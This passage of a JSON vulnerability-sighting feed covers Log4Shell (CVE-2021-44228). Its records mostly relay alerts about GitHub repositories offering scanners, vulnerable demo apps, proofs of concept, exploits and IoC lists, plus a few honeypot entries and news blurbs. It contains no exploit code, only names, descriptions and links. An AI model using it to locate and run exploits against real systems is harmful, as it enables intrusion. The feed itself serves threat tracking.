"GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA vulnerable device scanner for CVE-2021-44228 (Log4j)\nURL\uff1ahttps://github.com/sblmnl/Scan4j", "creation_timestamp": "2021-12-17T20:51:49.000000Z"}, {"uuid": "40d769c1-d1fe-4033-aafe-77cd2480ac47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1194", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPython script to detect Log4Shell Vulnerability CVE-2021-44228\nURL\uff1ahttps://github.com/Ghost086/Log4Shell-Scanner", "creation_timestamp": "2021-12-21T08:18:25.000000Z"}, {"uuid": "687a2d6b-12a5-4cf1-a5f0-7659e79eb892", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1218", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aAnsible playbook to verify target Linux hosts using the official Red Hat Log4j detector script RHSB-2021-009 for Log4Shell (CVE-2021-44228).\nURL\uff1ahttps://github.com/lucab85/ansible-role-log4shell", "creation_timestamp": "2021-12-23T13:31:41.000000Z"}, {"uuid": "7592a8ba-af25-42f9-a7f3-c4f3fe67f98e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1216", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aopen detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability\nURL\uff1ahttps://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit", "creation_timestamp": "2021-12-23T02:02:10.000000Z"}, {"uuid": "6a406a10-4b01-4a83-89a1-63a7c2f7a1c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1291", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA vulnerable Java based REST API for demonstrating CVE-2021-44228 (log4shell).\nURL\uff1ahttps://github.com/nix-xin/vuln4japi", "creation_timestamp": "2022-01-08T06:51:05.000000Z"}, {"uuid": "0a9bd3b5-7e34-4230-bfa8-2d362e81b78e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1133", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228 vulnerability in Apache Log4j library\nURL\uff1ahttps://github.com/Heliferepo/log4j", "creation_timestamp": "2021-12-17T08:50:20.000000Z"}, {"uuid": "d3e534da-a381-4107-9109-beeef099bdf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-12)", "content": "", "creation_timestamp": "2026-04-12T00:00:00.000000Z"}, {"uuid": "65e0c304-36f8-4b26-8609-3958ee6f56a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1131", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aAn automated, reliable scanner for the Log4Shell (CVE-2021-44228) vulnerability.\nURL\uff1ahttps://github.com/redhuntlabs/Log4JHunt", "creation_timestamp": "2021-12-17T07:45:11.000000Z"}, {"uuid": "2826216b-3a28-4a57-93a6-11897bc3eb7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1289", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more.\nURL\uff1ahttps://github.com/puzzlepeaches/Log4jHorizon", "creation_timestamp": "2022-01-07T22:38:58.000000Z"}, {"uuid": "17c40874-ee1c-45b8-a358-98ea06d93877", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1183", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA script to search, scrape and scan for Apache Log4j CVE-2021-44228 affected files using Google dorks\nURL\uff1ahttps://github.com/JagarYousef/log4j-dork-scanner", "creation_timestamp": "2021-12-20T12:05:46.000000Z"}, {"uuid": "c6dc85f5-912b-426a-8b88-88bc69da03a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1181", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1alog4j (CVE-2021-44228) Spring-boot web application with vulnerabilities\nURL\uff1ahttps://github.com/nikitapark/ITF-log4shell-vulnapp", "creation_timestamp": "2021-12-20T07:14:04.000000Z"}, {"uuid": "6db8b6fa-5f82-4e40-ace9-41a926b69dcf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1190", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aApplication vulnerable to CVE-2021-44228.\nURL\uff1ahttps://github.com/erickrr-bd/TekiumLog4jApp", "creation_timestamp": "2021-12-20T18:04:13.000000Z"}, {"uuid": "b815dd4b-c241-45fd-828e-349b5d6ac36c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1189", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228\nURL\uff1ahttps://github.com/m0rath/detect-log4j-exploitable", "creation_timestamp": "2021-12-20T17:56:00.000000Z"}, {"uuid": "16d44b60-5677-4cda-92b0-ee541da569dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1188", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aScript en bash que permite identificar la vulnerabilidad Log4j CVE-2021-44228 de forma remota.\nURL\uff1ahttps://github.com/julian911015/Log4j-Scanner-Exploit", "creation_timestamp": "2021-12-20T15:28:40.000000Z"}, {"uuid": "c6a9c937-8297-42a6-8b3e-2abb918ac3d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1285", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4jshell - CVE-2021-44228\nURL\uff1ahttps://github.com/Vulnmachines/log4jshell_CVE-2021-44228", "creation_timestamp": "2022-01-07T09:59:07.000000Z"}, {"uuid": "898e0a49-92b3-4ec2-bc3d-49720b789bc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1258", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1alog4j / log4shell IoCs from multiple sources put together in one big file (IPs) more coming soon  (CVE-2021-44228)\nURL\uff1ahttps://github.com/Nate0634034090/nate158g-m-w-n-l-p-d-a-o-e", "creation_timestamp": "2022-01-02T08:09:18.000000Z"}, {"uuid": "6cb248e9-92fe-4165-bf08-135c5477e54c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1360", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPOC for Infamous Log4j CVE-2021-44228\nURL\uff1ahttps://github.com/ColdFusionX/CVE-2021-44228-Log4Shell-POC", "creation_timestamp": "2022-01-18T19:27:45.000000Z"}, {"uuid": "bb2d5c0a-88ce-4978-8609-99766166fc14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1359", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aApache log4j2 CVE-20210-44228 poc\nURL\uff1ahttps://github.com/c4dr01d/CVE-2021-44228-poc", "creation_timestamp": "2022-01-18T13:35:52.000000Z"}, {"uuid": "cfc3c44b-3fcb-439d-b622-3c6019f2fefa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1358", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aFix: CVE-2021-44228 4LOGJ\nURL\uff1ahttps://github.com/tslenter/RS4LOGJ-CVE-2021-44228", "creation_timestamp": "2022-01-18T13:22:59.000000Z"}, {"uuid": "38c78b6d-88b8-4f1d-bb30-e7490083092c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1233", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1athis repository contains a POC of CVE-2021-44228 (log4j2shell) as part of a security research\nURL\uff1ahttps://github.com/ToxicEnvelope/XSYS-Log4J2Shell-Ex", "creation_timestamp": "2021-12-25T12:58:29.000000Z"}, {"uuid": "cd684f03-5662-4c13-9366-7e6aa54cdc89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1268", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSearchable page for CISA Log4j (CVE-2021-44228) Affected Vendor &amp; Software List\nURL\uff1ahttps://github.com/4jfinder/4jfinder.github.io", "creation_timestamp": "2022-01-04T16:37:25.000000Z"}, {"uuid": "091e6e3e-6bd3-4f62-b7d8-0dd3afb4ced8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1279", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4j2 LDAP \ucde8\uc57d\uc810 \ud14c\uc2a4\ud2b8 (CVE-2021-44228)\nURL\uff1ahttps://github.com/mklinkj/log4j2-test", "creation_timestamp": "2022-01-05T17:28:33.000000Z"}, {"uuid": "11c8d6de-0136-470c-82eb-699d7e844448", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1367", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aTesting WAF protection against CVE-2021-44228\nURL\uff1ahttps://github.com/robrankin/cve-2021-44228-waf-tests", "creation_timestamp": "2022-01-20T09:32:59.000000Z"}, {"uuid": "08b4aca0-3b6f-43b0-8f06-7c698b38e5c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1257", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aThis repository contains a Spring Boot web application vulnerable to CVE-2021-44228, known as Log4Shell.\nURL\uff1ahttps://github.com/romanutti/log4shell-vulnerable-app", "creation_timestamp": "2021-12-31T20:42:21.000000Z"}, {"uuid": "2ecaba81-9d6f-48b8-bad1-6e60fb08423a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1267", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSearchable page for CISA Log4j (CVE-2021-44228) Affected Vendor &amp; Software List\nURL\uff1ahttps://github.com/beauwoods/4jfinder", "creation_timestamp": "2022-01-04T16:28:45.000000Z"}, {"uuid": "399382a4-0a52-4fdb-8317-e58b22124a37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/GithubRedTeam/1262", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4J CVE-2021-44228 : Mitigation Cheat Sheet\nURL\uff1ahttps://github.com/thedevappsecguy/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105--CVE-2021-44832", "creation_timestamp": "2022-01-03T17:46:59.000000Z"}, {"uuid": "f9ecbffc-8d42-426e-8b9c-65dbd3382554", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1436", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1avulnerable setup to display an attack chain of log4j CVE-2021-44228 with privilege escalation to root using the polkit exploit CVE-2021-4034\nURL\uff1ahttps://github.com/0xalwayslucky/log4j-polkit-poc", "creation_timestamp": "2022-01-28T12:55:39.000000Z"}, {"uuid": "e6916e4a-6174-4a16-bcd8-b7342f3d6eae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BleepingComputer/11864", "content": "Latest news and stories from BleepingComputer.com\nAmazon Web Services fixes container escape in Log4Shell hotfix\n\nAmazon Web Services (AWS) has fixed four security issues in its hot patch from December that addressed the critical Log4Shell vulnerability (CVE-2021-44228) affecting cloud or on-premise environments running Java applications with a vulnerable version of the Log4j\u00a0logging library\u00a0or containers. [...]", "creation_timestamp": "2022-04-20T08:55:49.000000Z"}, {"uuid": "5d7723d7-f685-4abc-8d66-5717f9f79a28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-12)", "content": "", "creation_timestamp": "2026-04-12T00:00:00.000000Z"}, {"uuid": "bcd10a4a-b802-4923-8c67-2690957f9f0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1201", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPOC for CVE-2021-44228 within Springboot\nURL\uff1ahttps://github.com/mn-io/log4j-spring-vuln-poc", "creation_timestamp": "2021-12-21T15:31:21.000000Z"}, {"uuid": "9d60e553-2b4d-45ea-8d2c-f4c8ae98d21b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1208", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228 - Log4J Start To End Guide Book\nURL\uff1ahttps://github.com/NitinGavhane/CVE-2021-44228---Log4J", "creation_timestamp": "2021-12-22T05:19:55.000000Z"}, {"uuid": "2bad88a7-1670-40c7-8f0e-274f5f01aacc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1225", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1alog4j / log4shell IoCs from multiple sources put together in one big file (IPs) more coming soon  (CVE-2021-44228)\nURL\uff1ahttps://github.com/hackinghippo/log4shell_ioc_ips", "creation_timestamp": "2021-12-24T08:26:41.000000Z"}, {"uuid": "4d6da289-d5f3-4a74-98dd-cf796accf4da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1240", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aIOCs for CVE-2021-44228\nURL\uff1ahttps://github.com/cungts/VTI-IOCs-CVE-2021-44228", "creation_timestamp": "2021-12-27T09:55:43.000000Z"}, {"uuid": "dfed7ef2-6611-4358-9082-b615d0d6c958", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1238", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4Shell (CVE-2021-44228) is a zero-day vulnerability in Log4j\nURL\uff1ahttps://github.com/mazhar-hassan/log4j-vulnerability", "creation_timestamp": "2021-12-27T06:41:23.000000Z"}, {"uuid": "7c664ee5-c558-40f4-a955-19ed03b1034c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1237", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228\nURL\uff1ahttps://github.com/ceyhuncamli/Log4j_Attacker_IPList", "creation_timestamp": "2021-12-27T06:32:54.000000Z"}, {"uuid": "d3ee5713-9ac0-4cb8-8dfb-7253e8bcc7c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1280", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1alatest developments and resources on log4j vulnerability CVE-2021-44228\nURL\uff1ahttps://github.com/cryptoforcecommand/log4j-CVE-2021-44228", "creation_timestamp": "2022-01-05T21:04:24.000000Z"}, {"uuid": "c8433cdb-7ca3-450a-912f-a513f7937bfa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1295", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aThis Log4j RCE exploit originated from https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce\nURL\uff1ahttps://github.com/maximofernandezriera/CVE-2021-44228", "creation_timestamp": "2022-01-09T13:41:40.000000Z"}, {"uuid": "c1c72c7d-f891-4d97-9520-3ed092c47872", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1308", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aD\u00e9mo du fonctionnement de log4shell (CVE-2021-44228)\nURL\uff1ahttps://github.com/jxerome/log4shell", "creation_timestamp": "2022-01-12T23:48:28.000000Z"}, {"uuid": "7e9b8a70-2873-4f96-972e-efd9819eacc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1314", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aScript - Workaround instructions to address CVE-2021-44228 in vCenter Server \nURL\uff1ahttps://github.com/Fazmin/vCenter-Server-Workaround-Script-CVE-2021-44228", "creation_timestamp": "2022-01-13T14:24:43.000000Z"}, {"uuid": "44a427d4-fdbe-4768-ae95-fad1f2db6e9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1312", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aThis repository was created with the purpose to make it easy for organizations and individuals to study and research log4jshell vulnerability code name CVE-2021-44228.\nURL\uff1ahttps://github.com/adamtheapiguy/log4jshellPoC", "creation_timestamp": "2022-01-13T06:27:53.000000Z"}, {"uuid": "ea992d6f-0f13-421f-a5f9-33ed5fa2a82d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1276", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSpring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.\nURL\uff1ahttps://github.com/bsigouin/log4shell-vulnerable-app", "creation_timestamp": "2022-01-05T14:55:05.000000Z"}, {"uuid": "82c6e4e7-5748-4368-9f98-67263c7b3781", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "Telegram/SjtUQybD_B3LcKtvN4pes3aBjtY9n3yKlKndDYnZMakUTfs", "content": "", "creation_timestamp": "2021-12-15T13:53:33.000000Z"}, {"uuid": "bc05904b-01a7-44db-89f2-071ee992dc3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1244", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExplore CVE-2021-44228, a vulnerability in log4j affecting almost all software under the sun.\nURL\uff1ahttps://github.com/Bhagwatjadhav1997/tryhackme-Solar-exploiting-log4j", "creation_timestamp": "2021-12-29T07:51:14.000000Z"}, {"uuid": "f84e4bf8-a1cc-4839-a7bf-32e283890a1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-13)", "content": "", "creation_timestamp": "2026-04-13T00:00:00.000000Z"}, {"uuid": "5cb40f71-c7cd-4fa2-9eb6-166830f1f49e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BleepingComputer/12487", "content": "Latest news and stories from BleepingComputer.com\nCISA: Log4Shell exploits still being used to hack VMware servers\n\nCISA warned today that threat actors including state-backed hacking groups are still targeting\u00a0VMware Horizon\u00a0and Unified Access Gateway (UAG) servers using the\u00a0Log4Shell (CVE-2021-44228) remote code execution vulnerability. [...]", 